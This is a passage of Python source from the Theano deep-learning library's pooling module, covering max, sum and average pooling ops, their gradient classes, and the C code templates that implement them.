assert all(z > 0 for z in z_shape[-nd:])
if (z[0] is None) or (z[0].shape != z_shape):
z[0] = np.empty(z_shape, dtype=x.dtype)
zz = z[0]
# size of pooling output
pool_out_shp = zz.shape[-nd:]
img_shp = tuple(x.shape[-nd + i] + 2 * pad[i] for i in xrange(nd))
inc_pad = self.mode == 'average_inc_pad'
# pad the image
if max(pad) != 0:
y = np.zeros(x.shape[:-nd] + img_shp, dtype=x.dtype)
y[(slice(None),) * (len(x.shape) - nd) +
tuple(slice(pad[i], img_shp[i] - pad[i]) for i in xrange(nd))] = x
else:
y = x
func = np.max
if self.mode == 'sum':
func = np.sum
elif self.mode != 'max':
func = np.average
# precompute the region boundaries for each dimension
region_slices = [[] for i in xrange(nd)]
for i in xrange(nd):
for j in xrange(pool_out_shp[i]):
start = j * stride[i]
end = builtins.min(start + ws[i], img_shp[i])
if not inc_pad:
start = builtins.max(start, pad[i])
end = builtins.min(end, img_shp[i] - pad[i])
region_slices[i].append(slice(start, end))
# iterate over non-pooling dimensions
for k in np.ndindex(*x.shape[:-nd]):
zzk = zz[k]
yk = y[k]
# iterate over pooling regions
for r in np.ndindex(*pool_out_shp):
zzk[r] = func(
yk[[region_slices[i][r[i]] for i in xrange(nd)]])
def infer_shape(self, node, in_shapes):
ws, stride, pad = [node.inputs[1], node.inputs[2], node.inputs[3]]
shp = self.out_shape(in_shapes[0], ws, self.ignore_border, stride,
pad, self.ndim)
return [shp]
def L_op(self, inputs, outputs, grads):
x, ws, stride, pad = inputs
gz, = grads
disc = [DisconnectedType()() for i in inputs[1:]]
if self.mode == 'max':
return [MaxPoolGrad(ndim=self.ndim,
ignore_border=self.ignore_border)(
x, outputs[0], gz, ws=ws, stride=stride, pad=pad)] + disc
else:
return [AveragePoolGrad(ndim=self.ndim,
ignore_border=self.ignore_border,
mode=self.mode)(
x, gz, ws=ws, stride=stride, pad=pad)] + disc
def connection_pattern(self, node):
return [[1], [0], [0], [0]]
def R_op(self, inputs, eval_points):
if self.mode != 'max':
# Rop for average or sum is simply pooling evaluated at eval point
eval_inputs = [eval_points[0]] + inputs[1:]
return [self(*eval_inputs)]
# R_op can receive None as eval_points.
# That mean there is no diferientiable path through that input
# If this imply that you cannot compute some outputs,
# return None for those.
if eval_points[0] is None:
return [None]
z = self(*inputs)
x, ws, stride, pad = inputs
return [
DownsampleFactorMaxGradGrad(self.ignore_border, self.mode,
self.ndim)(x, z, eval_points[0], ws,
stride, pad)
]
def c_headers(self):
headers = ['<algorithm>']
headers += super(Pool, self).c_headers()
return headers
def c_code(self, node, name, inp, out, sub):
if self.mode not in ('max', 'sum', 'average_exc_pad', 'average_inc_pad'):
raise theano.gof.utils.MethodNotDefined()
x, ws, stride, pad = inp
z, = out
nd = self.ndim
total_ndim = node.inputs[0].ndim
non_pool_ndim = total_ndim - nd
fail = sub['fail']
params = sub['params']
if self.openmp:
# run in parallel over each pooling block
omp_parallel = '#pragma omp parallel for private(r_st, r_end, r_idx, i_idx, o_idx, collector) schedule(static)'
else:
omp_parallel = ''
ccode = """
int typenum = PyArray_ObjectType((PyObject*)%(x)s, 0);
if(PyArray_NDIM(%(x)s)!=%(total_ndim)s)
{
PyErr_SetString(PyExc_ValueError, "x must be a %(total_ndim)sD ndarray");
%(fail)s;
}
if(PyArray_DIM(%(ws)s, 0)!=%(nd)s)
{
PyErr_SetString(PyExc_ValueError, "ws must be a vector of size %(nd)s");
%(fail)s;
}
if(PyArray_DIM(%(stride)s, 0)!=%(nd)s)
{
PyErr_SetString(PyExc_ValueError, "stride must be a vector of size %(nd)s");
%(fail)s;
}
if(PyArray_DIM(%(pad)s, 0)!=%(nd)s)
{
PyErr_SetString(PyExc_ValueError, "pad must be a vector of size %(nd)s");
%(fail)s;
}
int z[%(nd)s]; // shape of the output
int r[%(nd)s]; // shape of the padded_input
int ws[%(nd)s];
int st[%(nd)s];
int pd[%(nd)s];
int nonzero_padding;
nonzero_padding = 0;
for (int i=0; i<%(nd)s; i++)
{
ws[i] = *((npy_intp*)PyArray_GETPTR1(%(ws)s, i));
st[i] = *((npy_intp*)PyArray_GETPTR1(%(stride)s, i));
pd[i] = *((npy_intp*)PyArray_GETPTR1(%(pad)s, i));
r[i] = PyArray_DIMS(%(x)s)[%(non_pool_ndim)s + i] + 2 * pd[i];
if (pd[i]>0)
nonzero_padding = 1;
}
if (!%(params)s->ignore_border && nonzero_padding)
{
PyErr_SetString(PyExc_ValueError,
"padding must be zero when ignore border is False");
%(fail)s;
}
if (%(params)s->ignore_border)
{
for (int i=0; i<%(nd)s; i++)
{
// '/' in C is different from '/' in python
if (r[i] - ws[i] < 0)
{
z[i] = 0;
}
else
{
z[i] = (r[i] - ws[i]) / st[i] + 1;
}
}
}
else
{
for (int i=0; i<%(nd)s; i++)
{
// decide how many rows/cols the output has
if (st[i] >= ws[i])
{
z[i] = (r[i] - 1) / st[i] + 1;
}
else
{
z[i] = std::max(0, (r[i] - 1 - ws[i] + st[i]) / st[i]) + 1;
}
assert(z[i] > 0);
}
}
// memory allocation of z if necessary
int mem_nec;
mem_nec = 0;
if ((!%(z)s) || *PyArray_DIMS(%(z)s)!=%(total_ndim)s)
{
mem_nec = 1;
}
if (!mem_nec)
{
for (int i=0; i<%(non_pool_ndim)s; i++)
{
if (PyArray_DIMS(%(z)s)[i] != PyArray_DIMS(%(x)s)[i])
{
mem_nec = 1;
break;
}
}
}
if (!mem_nec)
{
for (int i=0; i<%(nd)s; i++)
{
if (PyArray_DIMS(%(z)s)[%(non_pool_ndim)s + i] != z[i])
{
mem_nec = 1;
break;
}
}
}
if (mem_nec)
{
if (%(z)s) Py_XDECREF(%(z)s);
npy_intp dims[%(total_ndim)s];
for (int i=0; i<%(non_pool_ndim)s; i++)
{
dims[i] = PyArray_DIMS(%(x)s)[i];
}
for (int i=0; i<%(nd)s; i++)
{
dims[%(non_pool_ndim)s + i] = z[i];
}
//TODO: zeros not necessary
%(z)s = (PyArrayObject*) PyArray_ZEROS(%(total_ndim)s, dims, typenum,0);
}
// initialize temp var for the value in a region
dtype_%(x)s collector;
int z_prod;
// do not run if any z[i] is zero
z_prod = 1;
for (int i=0; i<%(nd)s; i++)
{
z_prod *= z[i];
}
if (z_prod)
{
// will be used to hold start and end index of a region
int r_st[%(nd)s];
int r_end[%(nd)s];
// index for iterating over the pooling regions
int r_idx[%(nd)s];
// placeholder for PyArray indexing (output)
npy_intp o_idx[%(total_ndim)s];
// placeholder for PyArray indexing (input)
npy_intp i_idx[%(total_ndim)s];
// loop over non-pooling dimensions
int non_pooling_prod = 1;
for (int i=0; i<%(non_pool_ndim)s; i++)
{
non_pooling_prod *= PyArray_DIMS(%(x)s)[i];
}
%(omp_parallel)s
// first loop over non-pooling dimensions
for (int t=0; t<non_pooling_prod; t++)
{
// compute the non-pooling index in each dimension
if (%(non_pool_ndim)s!=0)
{
o_idx[0] = t;
i_idx[0] = t;
for (int i=1; i<%(non_pool_ndim)s; i++)
{
o_idx[i] = o_idx[i - 1] / PyArray_DIMS(%(x)s)[i - 1];
o_idx[i - 1] = o_idx[i - 1] %% PyArray_DIMS(%(x)s)[i - 1];
i_idx[i] = o_idx[i];
i_idx[i - 1] = o_idx[i - 1];
}
}
// then loop over each region in each pooling dimension
"""
for i in xrange(nd):
ccode += """
for (r_idx[%(i)s]=0; r_idx[%(i)s] < z[%(i)s]; r_idx[%(i)s]++) {
r_st[%(i)s] = r_idx[%(i)s] * st[%(i)s];
r_end[%(i)s] = r_st[%(i)s] + ws[%(i)s];
// skip the padding
r_st[%(i)s] = r_st[%(i)s] < pd[%(i)s] ? pd[%(i)s] : r_st[%(i)s];
r_end[%(i)s] = r_end[%(i)s] > (r[%(i)s] - pd[%(i)s]) ? r[%(i)s] - pd[%(i)s] : r_end[%(i)s];
// from padded_img space to img space
r_st[%(i)s] -= pd[%(i)s];
r_end[%(i)s] -= pd[%(i)s];
// handle the case where no padding, ignore border is True
if (%(params)s->ignore_border)
{
r_end[%(i)s] = r_end[%(i)s] > r[%(i)s] ? r[%(i)s] : r_end[%(i)s];
}
// use the index to find the correct position in the output
o_idx[%(non_pool_ndim)s + %(i)s] = r_idx[%(i)s];
""" % dict(i=i, non_pool_ndim=non_pool_ndim, params=sub['params'])
ccode += """
// get a pointer to the correct position in the output
dtype_%(z)s * z;
if (%(total_ndim)s == 4)
z = ((dtype_%(z)s*)(PyArray_GETPTR4(%(z)s, o_idx[0], o_idx[1], o_idx[2], o_idx[3])));
else
z = ((dtype_%(z)s*)(PyArray_GetPtr(%(z)s, o_idx)));
"""
if self.mode == 'max':
for i in xrange(nd):
ccode += """
// set the first index of dimension %(i)s
i_idx[%(non_pool_ndim)s + %(i)s] = r_st[%(i)s];
""" % dict(i=i, non_pool_ndim=non_pool_ndim)
ccode += """
// use the first element as the initial value of collector
if (%(total_ndim)s == 4)
collector = ((dtype_%(x)s*)(PyArray_GETPTR4(%(x)s,i_idx[0],i_idx[1],i_idx[2],i_idx[3])))[0];
else
collector = ((dtype_%(x)s*)(PyArray_GetPtr(%(x)s,i_idx)))[0];
"""
for i in xrange(nd):
ccode += """
// go through the pooled region in the unpadded input
for(int m%(i)s=r_st[%(i)s]; m%(i)s<r_end[%(i)s]; m%(i)s++)
{
i_idx[%(non_pool_ndim)s + %(i)s] = m%(i)s;
""" % dict(i=i, non_pool_ndim=non_pool_ndim)
ccode += """
// update maximum
dtype_%(x)s a;
if (%(total_ndim)s == 4)
a = ((dtype_%(x)s*)(PyArray_GETPTR4(%(x)s,i_idx[0],i_idx[1],i_idx[2],i_idx[3])))[0];
else
a = ((dtype_%(x)s*)(PyArray_GetPtr(%(x)s,i_idx)))[0];
collector = (a > collector) ? a : collector;
"""
for i in xrange(nd):
ccode += """
} // for loop over region
"""
ccode += """
z[0] = collector;
"""
elif self.mode in ('sum', 'average_exc_pad', 'average_inc_pad'):
ccode += """
// initialize the sum at zero
collector = ((dtype_%(x)s)(0));
"""
for i in xrange(nd):
ccode += """
// go through the pooled region in the unpadded input
for(int m%(i)s=r_st[%(i)s]; m%(i)s<r_end[%(i)s]; m%(i)s++)
{
i_idx[%(non_pool_ndim)s + %(i)s] = m%(i)s;
""" % dict(i=i, non_pool_ndim=non_pool_ndim)
ccode += """
// update sum
dtype_%(x)s a;
if (%(total_ndim)s == 4)
a = ((dtype_%(x)s*)(PyArray_GETPTR4(%(x)s,i_idx[0],i_idx[1],i_idx[2],i_idx[3])))[0];
else
a = ((dtype_%(x)s*)(PyArray_GetPtr(%(x)s,i_idx)))[0];
collector += a;
"""
for i in xrange(nd):
ccode += """
} // for loop over region
"""
if self.mode == "sum":
ccode += """
z[0] = collector;
"""
elif self.mode == 'average_inc_pad' and self.ignore_border:
# region size = product over all pooling dimensions
region_size = ' * '.join('ws[%d]' % i for i in xrange(nd))
ccode += """
z[0] = collector / (%(region_size)s);
""" % dict(region_size=region_size)
else:
# region size = number elements of in this region
region_size = ' * '.join('(r_end[%d]-r_st[%d])' % (i, i) for i in xrange(nd))
ccode += """
z[0] = collector / (%(region_size)s);
""" % dict(region_size=region_size)
for i in xrange(nd):
ccode += """
} // loop over pooling dimension
"""
ccode += """
} // for loop over non-pooling dimensions
} // if z_prod
"""
return ccode % locals()
def c_code_cache_version(self):
return (9, self.openmp)
class PoolGrad(OpenMPOp):
__props__ = ('ignore_border', 'mode', 'ndim')
@staticmethod
def out_shape(imgshape, ws=None, ignore_border=False, stride=None, pad=None, ndim=2,
ds=None, st=None, padding=None):
"""Return the shape of the output from this op, for input of given
shape and flags.
Parameters
----------
imgshape : tuple of integers or scalar Theano variables
the shape of a tensor of images. The last N elements are
interpreted as the downsampling dimensions.
ws : tuple of N ints
downsample factor over rows and columns this parameter
indicates the size of the pooling region
ignore_border : bool
If ws doesn't divide imgshape, do we include an extra row/col/slice
of partial downsampling (False) or ignore it (True).
stride : list or tuple of N ints or None
Stride size, which is the number of shifts over rows/cols/slices to get the
next pool region. If stride is None, it is considered equal to ws
(no overlap on pooling regions).
pad : tuple of N ints or None
For each downsampling dimension, this specifies the number of zeros to
add as padding on both sides. For 2D and (pad_h, pad_w), pad_h specifies the
size of the top and bottom margins, pad_w specifies the size of the left and
right margins. No padding is added if pad is None.
ndim : int
The number of pooling dimensions N.
The default is 2.
ds
*deprecated*, use parameter ws instead.
st
*deprecated*, use parameter st instead.
padding
*deprecated*, use parameter pad instead.
Returns
-------
list :
the shape of the output from this op, for input of given
shape. This will have the same length as imgshape, but
with last N elements reduced as per the downsampling &
ignore_border flags.
"""
# check for deprecated parameter names
if ds is not None:
if ws is not None:
raise ValueError(
"You can't provide a tuple value to both 'ws' and 'ds'."
" Please provide a value only to 'ws'."
)
else:
warnings.warn(
"DEPRECATION: the 'ds' parameter in PoolGrad is not going"
" to exist anymore as it is going to be replaced by the"
" parameter 'ws'.",
stacklevel=2
)
ws = ds
elif ds is None and ws is None:
raise ValueError(
"You must provide a tuple value for the window size."
)
if st is not None:
if stride is not None:
raise ValueError(
"You can't provide a tuple value to both 'st and 'stride'."
" Please provide a value only to 'stride'."
)
else:
warnings.warn(
"DEPRECATION: the 'st' parameter in PoolGrad is not going"
" to exist anymore as it is going to be replaced by the"
" parameter 'stride'.",
stacklevel=2
)
stride = st
if padding is not None:
if pad is not None:
raise ValueError(
"You can't provide a tuple value to both 'padding' and pad."
" Please provide a value only to pad."
)
else:
warnings.warn(
"DEPRECATION: the 'padding' parameter in PoolGrad is not"
" going to exist anymore as it is going to be replaced"
" by the parameter 'pad'.",
stacklevel=2
)
pad = padding
if len(imgshape) < ndim:
raise TypeError('imgshape must have at least {} dimensions'.format(ndim))
if stride is None:
stride = ws
if pad is None:
pad = (0,) * ndim
patch_shape = tuple(tensor.extract_constant(imgshape[-ndim + i]) + pad[i] * 2
for i in xrange(ndim))
def compute_out(v, downsample, stride):
if ignore_border:
out = (v - downsample) // stride + 1
if isinstance(out, theano.Variable):
return tensor.maximum(out, 0)
else:
return np.maximum(out, 0)
else:
if isinstance(v, theano.Variable):
return tensor.switch(tensor.ge(stride, downsample),
(v - 1) // stride + 1,
tensor.maximum(0, (v - 1 - downsample) //
stride + 1) + 1)
elif stride >= downsample:
return (v - 1) // stride + 1
else:
return max(0, (v - 1 - downsample) // stride + 1) + 1
out_shape = [compute_out(patch_shape[i], ws[i], stride[i]) for i in xrange(ndim)]
rval = list(imgshape[:-ndim]) + out_shape
return rval
def __init__(self, ignore_border, mode='max', ndim=2, openmp=None):
self.ndim = ndim
self.ignore_border = ignore_border
if mode == 'max_deterministic':
# It seems max pool grad algo is already deterministic in CPU.
mode = 'max'
if mode not in ['max', 'sum', 'average_inc_pad', 'average_exc_pad']:
raise ValueError(
"Pool mode parameter only support 'max', 'sum',"
" 'average_inc_pad' and 'average_exc_pad'. Got %s" % mode)
self.mode = mode
super(PoolGrad, self).__init__(openmp=openmp)
def prepare_node(self, node, storage_map, compute_map, impl):
if len(node.inputs) < 5: # 5 for AveragePoolGrad, 6 for MaxPoolGrad
# Old interface
self.ndim = len(node.op.ds)
self.mode = node.op.mode
ws = theano.tensor.constant(node.op.ds)
st = theano.tensor.constant(node.op.st)
pad = theano.tensor.constant(node.op.padding)
node.inputs.append(ws)
node.inputs.append(st)
node.inputs.append(pad)
if isinstance(ws, theano.Constant):
storage_map[ws] = [ws.data]
compute_map[ws] = [True]
else:
storage_map[ws] = [None]
compute_map[ws] = [False]
if isinstance(st, theano.Constant):
storage_map[st] = [st.data]
compute_map[st] = [True]
else:
storage_map[st] = [None]
compute_map[st] = [False]
if isinstance(pad, theano.Constant):
storage_map[pad] = [pad.data]
compute_map[pad] = [True]
else:
storage_map[pad] = [None]
compute_map[pad] = [False]
def infer_shape(self, node, in_shapes):
return [in_shapes[0]]
class MaxPoolGrad(PoolGrad):
# params_type ignore_border don't change c code
def __init__(self, ignore_border, ndim=2, openmp=None):
PoolGrad.__init__(self, ignore_border, mode='max', ndim=ndim, openmp=openmp)
def make_node(self, x, maxout, gz, ws, stride=None, pad=None):
# make_node should only be called by the grad function of
# Pool, so these asserts should not fail.
x = tensor.as_tensor_variable(x)
maxout = tensor.as_tensor_variable(maxout)
gz = tensor.as_tensor_variable(gz)
nd = self.ndim
if stride is None:
stride = ws
if pad is None:
pad = (0,) * nd
ws = tensor.as_tensor_variable(ws)
stride = tensor.as_tensor_variable(stride)
pad = tensor.as_tensor_variable(pad)
assert isinstance(x, Variable) and x.ndim >= nd
assert isinstance(maxout, Variable) and maxout.ndim >= nd
assert isinstance(gz, Variable) and gz.ndim >= nd
assert isinstance(ws, Variable) and ws.ndim == 1
assert isinstance(stride, Variable) and stride.ndim == 1
assert isinstance(pad, Variable) and pad.ndim == 1
assert x.ndim == maxout.ndim == gz.ndim >= nd
if ws.dtype not in tensor.int_dtypes:
raise TypeError('Pool downsample parameters must be ints.')
if stride.dtype not in tensor.int_dtypes:
raise TypeError('Stride parameters must be ints.')
if pad.dtype not in tensor.int_dtypes:
raise TypeError('Padding parameters must be ints.')
return Apply(self, [x, maxout, gz, ws, stride, pad], [x.type()])
def perform(self, node, inp, out):
assert self.mode == 'max'
x, maxout, gz, ws, stride, pad = inp
gx_stg, = out
nd = self.ndim
assert ws.shape == stride.shape == pad.shape == (nd,)
if len(x.shape) < nd:
raise NotImplementedError(
'MaxPoolGrad requires input with {} or more dimensions'.format(nd))
pool_out_shp = maxout.shape[-nd:]
img_shp = tuple(x.shape[-nd + i] + 2 * pad[i] for i in xrange(nd))
# pad the image
if max(pad) != 0:
y = np.zeros(x.shape[:-nd] + img_shp, dtype=x.dtype)
y[(slice(None),) * (len(x.shape) - nd) +
tuple(slice(pad[i], img_shp[i] - pad[i]) for i in xrange(nd))] = x
else:
y = x
gx = np.zeros_like(y)
# precompute the region boundaries for each dimension
region_ranges = [[] for i in xrange(nd)]
for i in xrange(nd):
for j in xrange(pool_out_shp[i]):
start = builtins.max(j * stride[i], pad[i])
end = builtins.min(start + ws[i], img_shp[i])
region_ranges[i].append(xrange(start, end))
# iterate over non-pooling dimensions
for k in np.ndindex(*x.shape[:-nd]):
gxk = gx[k]
gzk = gz[k]
yk = y[k]
maxoutk = maxout[k]
# iterate over pooling regions
for r in np.ndindex(*pool_out_shp):
maxout_value = maxoutk[r]
# iterate inside region
for c in itertools.product(*[region_ranges[i][r[i]]
for i in xrange(nd)]):
if maxout_value == yk[c]:
gxk[c] += gzk[r]
# unpad the image
gx = gx[(slice(None),) * (len(x.shape) - nd) +
tuple(slice(pad[i], img_shp[i] - pad[i]) for i in xrange(nd))]
gx_stg[0] = gx
def grad(self, inp, grads):
x, maxout, gz, ws, stride, pad = inp
ggx, = grads
return ([theano.tensor.zeros_like(x),
theano.tensor.zeros_like(maxout),
DownsampleFactorMaxGradGrad(ndim=self.ndim,
ignore_border=self.ignore_border)(
x, maxout, ggx, ws, stride, pad)] +
[DisconnectedType()() for i in inp[3:]])
def connection_pattern(self, node):
return [[1], [1], [1], [0], [0], [0]]
def c_code(self, node, name, inp, out, sub):
assert self.mode == 'max'
x, z, gz, ws, stride, pad = inp
gx, = out
nd = self.ndim
total_ndim = node.inputs[0].ndim
non_pool_ndim = total_ndim - nd
fail = sub['fail']
if self.openmp:
# run in parallel over each pooling block
omp_parallel = '#pragma omp parallel for private(r_st, r_end, r_idx, i_idx, o_idx, maximum) schedule(static)'
else:
omp_parallel = ''
ccode = """
// sanity checks
int x_typenum = PyArray_ObjectType((PyObject*)%(x)s, 0);
int z_typenum = PyArray_ObjectType((PyObject*)%(z)s, 0);
int gz_typenum = PyArray_ObjectType((PyObject*)%(gz)s, 0);
if ((x_typenum != z_typenum) || (x_typenum != gz_typenum))
{
PyErr_SetString(PyExc_ValueError, "input types must all match");
%(fail)s;
}
if(PyArray_NDIM(%(x)s)!=%(total_ndim)s)
{
PyErr_SetString(PyExc_ValueError, "x must be a %(total_ndim)sD ndarray");
%(fail)s;
}
if(PyArray_NDIM(%(z)s)!=%(total_ndim)s)
{
PyErr_SetString(PyExc_ValueError, "z must be a %(total_ndim)sD ndarray");
%(fail)s;
}
if(PyArray_NDIM(%(gz)s)!=%(total_ndim)s)
{
PyErr_SetString(PyExc_ValueError, "gz must be a %(total_ndim)sD ndarray");
%(fail)s;
}
if(PyArray_DIM(%(ws)s, 0)!=%(nd)s)
{
PyErr_SetString(PyExc_ValueError, "ws must be a vector of size %(nd)s");
%(fail)s;
}
if(PyArray_DIM(%(stride)s, 0)!=%(nd)s)
{
PyErr_SetString(PyExc_ValueError, "stride must be a vector of size %(nd)s");
%(fail)s;
}
if(PyArray_DIM(%(pad)s, 0)!=%(nd)s)
{
PyErr_SetString(PyExc_ValueError, "pad must be a vector of size %(nd)s");
%(fail)s;
}
int z[%(nd)s]; // shape of the output
int r[%(nd)s]; // shape of the padded_input
int ws[%(nd)s];
int st[%(nd)s];
int pd[%(nd)s];
int nonzero_padding;
nonzero_padding = 0;
for (int i=0; i<%(nd)s; i++)
{
ws[i] = *((npy_intp*)PyArray_GETPTR1(%(ws)s, i));
st[i] = *((npy_intp*)PyArray_GETPTR1(%(stride)s, i));
pd[i] = *((npy_intp*)PyArray_GETPTR1(%(pad)s, i));
z[i] = PyArray_DIMS(%(z)s)[%(non_pool_ndim)s + i];
r[i] = PyArray_DIMS(%(x)s)[%(non_pool_ndim)s + i] + 2 * pd[i];
if (pd[i]>0)
nonzero_padding = 1;
}
// allocating memory for output, if necessary
int mem_nec;
mem_nec = 0;
if ((!%(gx)s) || !PyArray_ISCONTIGUOUS(%(gx)s)
|| *PyArray_DIMS(%(gx)s)!=%(total_ndim)s)
{
mem_nec = 1;
}
if (!mem_nec)
{
for (int i=0; i<%(total_ndim)s; i++)
{
if (PyArray_DIMS(%(gx)s)[i] != PyArray_DIMS(%(x)s)[i])
{
mem_nec = 1;
break;
}
}
}
if (mem_nec)
{
Py_XDECREF(%(gx)s);
%(gx)s = (PyArrayObject*) PyArray_ZEROS(%(total_ndim)s, PyArray_DIMS(%(x)s), x_typenum,0);
}
else {
PyArray_FILLWBYTE(%(gx)s, 0);
}
dtype_%(z)s maximum; // temp var for maximum value in a region
int z_prod;
// do not run if any z[i] is zero
z_prod = 1;
for (int i=0; i<%(nd)s; i++)
{
z_prod *= z[i];
}
if (z_prod)
{
// will be used to hold start and end index of a region
int r_st[%(nd)s];
int r_end[%(nd)s];
// index for iterating over the pooling regions
int r_idx[%(nd)s];
// placeholder for PyArray indexing (output)
npy_intp o_idx[%(total_ndim)s];
// placeholder for PyArray indexing (input)
npy_intp i_idx[%(total_ndim)s];
// loop over non-pooling dimensions
int non_pooling_prod = 1;
for (int i=0; i<%(non_pool_ndim)s; i++)
{
non_pooling_prod *= PyArray_DIMS(%(x)s)[i];
}
%(omp_parallel)s
// first loop over non-pooling dimensions
for (int t=0; t<non_pooling_prod; t++)
{
// compute the non-pooling index in each dimension
if (%(non_pool_ndim)s!=0)
{
o_idx[0] = t;
i_idx[0] = t;
for (int i=1; i<%(non_pool_ndim)s; i++)
{
o_idx[i] = o_idx[i - 1] / PyArray_DIMS(%(x)s)[i - 1];
o_idx[i - 1] =o_idx[i - 1] %% PyArray_DIMS(%(x)s)[i - 1];
i_idx[i] = o_idx[i];
i_idx[i - 1] = o_idx[i - 1];
}
}
// then loop over each region in each pooling dimension
"""
for i in xrange(nd):
ccode += """
for (r_idx[%(i)s]=0; r_idx[%(i)s] < z[%(i)s]; r_idx[%(i)s]++) {
r_st[%(i)s] = r_idx[%(i)s] * st[%(i)s];
r_end[%(i)s] = r_st[%(i)s] + ws[%(i)s];
// skip the padding
r_st[%(i)s] = r_st[%(i)s] < pd[%(i)s] ? pd[%(i)s] : r_st[%(i)s];
r_end[%(i)s] = r_end[%(i)s] > (r[%(i)s] - pd[%(i)s]) ? r[%(i)s] - pd[%(i)s] : r_end[%(i)s];
// from padded_img space to img space
r_st[%(i)s] -= pd[%(i)s];
r_end[%(i)s] -= pd[%(i)s];
// use the index to find the correct position in the output
o_idx[%(non_pool_ndim)s + %(i)s] = r_idx[%(i)s];
""" % dict(i=i, non_pool_ndim=non_pool_ndim)
ccode += """
dtype_%(gz)s * gz;
if (%(total_ndim)s == 4)
{
// the maximum value
maximum = ((dtype_%(z)s*)(PyArray_GETPTR4(%(z)s,o_idx[0],o_idx[1],o_idx[2],o_idx[3])))[0];
// the gradient corresponding to this maximum value in z
gz = ((dtype_%(gz)s*)(PyArray_GETPTR4(%(gz)s, o_idx[0],o_idx[1],o_idx[2],o_idx[3])));
}
else
{
// the maximum value
maximum = ((dtype_%(z)s*)(PyArray_GetPtr(%(z)s,o_idx)))[0];
// the gradient corresponding to this maximum value in z
gz = ((dtype_%(gz)s*)(PyArray_GetPtr(%(gz)s, o_idx)));
}
"""
for i in xrange(nd):
ccode += """
// go through the pooled region in the unpadded input
for(int m%(i)s=r_st[%(i)s]; m%(i)s<r_end[%(i)s]; m%(i)s++)
{
i_idx[%(non_pool_ndim)s + %(i)s] = m%(i)s;
""" % dict(i=i, non_pool_ndim=non_pool_ndim)
ccode += """
dtype_%(x)s a;
dtype_%(gx)s * gx;
if (%(total_ndim)s == 4)
{
a = ((dtype_%(x)s*)(PyArray_GETPTR4(%(x)s,i_idx[0],i_idx[1],i_idx[2],i_idx[3])))[0];
gx = ((dtype_%(gx)s*)(PyArray_GETPTR4(%(gx)s, i_idx[0],i_idx[1],i_idx[2],i_idx[3])));
}
else
{
a = ((dtype_%(x)s*)(PyArray_GetPtr(%(x)s,i_idx)))[0];
gx = ((dtype_%(gx)s*)(PyArray_GetPtr(%(gx)s, i_idx)));
}
if (a == maximum){
gx[0] = gx[0] + gz[0];
}
"""
for i in xrange(nd):
ccode += """
} // for loop over region
"""
for i in xrange(nd):
ccode += """
} // loop over pooling dimension
"""
ccode += """
} // for loop over non-pooling dimensions
} // if z_prod
"""
return ccode % locals()
def c_code_cache_version(self):
return (0, 10, self.openmp)
class AveragePoolGrad(PoolGrad):
# ignore_border is used for perform, but not c code. No need in params_type
def __init__(self, ignore_border, mode='average_inc_pad', ndim=2):
assert mode in ['sum', 'average_inc_pad', 'average_exc_pad']
PoolGrad.__init__(self, ignore_border, mode, ndim)
# There is an extra dummy parameter to match the parameter count
# of MaxPoolGrad. They have to keep the same interface because of
# the DownsampleFactorMaxGrad trick to keep old scripts working
# (see downsample.py for details on this).
def make_node(self, x, gz, ws, stride=None, pad=None, dummy=None):
# make_node should only be called by the grad function of
# Pool, so these asserts should not fail.
x = tensor.as_tensor_variable(x)
gz = tensor.as_tensor_variable(gz)
nd = self.ndim
if stride is None:
stride = ws
if pad is None:
pad = (0,) * nd
ws = tensor.as_tensor_variable(ws)
stride = tensor.as_tensor_variable(stride)
pad = tensor.as_tensor_variable(pad)
assert isinstance(x, Variable) and x.ndim >= nd
assert isinstance(gz, Variable) and gz.ndim >= nd
assert isinstance(ws, Variable) and ws.ndim == 1
assert isinstance(stride, Variable) and stride.ndim == 1
assert x.ndim == gz.ndim >= nd
assert isinstance(pad, Variable) and pad.ndim == 1
if ws.dtype not in tensor.int_dtypes:
raise TypeError('Pool downsample parameters must be ints.')
if stride.dtype not in tensor.int_dtypes:
raise TypeError('Stride parameters must be ints.')
if pad.dtype not in tensor.int_dtypes:
raise TypeError('Padding parameters must be ints.')
return Apply(self, [x, gz, ws, stride, pad], [x.type()])
def perform(self, node, inp, out):
x, gz, ws, stride, pad = inp
gx_stg, = out
nd = self.ndim
assert ws.shape == stride.shape == pad.shape == (nd,)
if len(x.shape) < nd:
raise NotImplementedError(
'AveragePoolGrad requires input with {} or more dimensions'.format(nd))
if self.mode == 'average_exc_pad' and max(pad) != 0:
raise NotImplementedError()
z_shape = self.out_shape(x.shape, ws, self.ignore_border, stride, pad, nd)
if (gx_stg[0] is None) or (gx_stg[0].shape != z_shape):
gx_stg[0] = np.empty(z_shape, dtype=x.dtype)
zz = gx_stg[0]
# size of pooling output
pool_out_shp = zz.shape[-nd:]
img_shp = tuple(x.shape[-nd + i] + 2 * pad[i] for i in xrange(nd))
inc_pad = self.mode == 'average_inc_pad'
sum_mode = self.mode == 'sum'
# initialize the padded output
gx = np.zeros((x.shape[:-nd] + img_shp), dtype=x.dtype)
# precompute the region boundaries and sizes for each dimension
region_slices = [[] for i in xrange(nd)]
region_sizes = [[] for i in xrange(nd)]
for i in xrange(nd):
for j in xrange(pool_out_shp[i]):
if sum_mode or inc_pad:
start = j * stride[i]
else:
start = builtins.max(j * stride[i], pad[i])
end = builtins.min(start + ws[i], img_shp[i])
region_slices[i].append(slice(start, end))
region_sizes[i].append(end - start)
# iterate over non-pooling dimensions
region_slice = [None] * nd
for k in np.ndindex(*x.shape[:-nd]):
gzk = gz[k]
gxk = gx[k]
# iterate over pooling regions
for r in np.ndindex(*pool_out_shp):
region_size = 1
for i in xrange(nd):
region_slice[i] = region_slices[i][r[i]]
region_size *= region_sizes[i][r[i]]
if sum_mode:
val = gzk[r]
else:
# divide by region size
val = gzk[r] / region_size
gxk[region_slice] += val
# unpad the image
gx = gx[(slice(None),) * (len(x.shape) - nd) +
tuple(slice(pad[i], img_shp[i] - pad[i]) for i in xrange(nd))]
gx_stg[0] = gx
def grad(self, inp, grads):
x, gz, ws, stride, pad = inp
ggx, = grads
return ([theano.tensor.zeros_like(x),
Pool(ignore_border=self.ignore_border,
ndim=self.ndim, mode=self.mode)(ggx,
ws, stride, pad)] + [DisconnectedType()() for i in inp[2:]])
def connection_pattern(self, node):
return [[1], [1], [0], [0], [0]]
def c_code(self, node, name, inp, out, sub):
x, gz, ws, stride, pad = inp
gx, = out
nd = self.ndim
total_ndim = node.inputs[0].ndim
non_pool_ndim = total_ndim - nd
fail = sub['fail']
inc_pad = int(self.mode == 'average_inc_pad')
sum_mode = int(self.mode == 'sum')
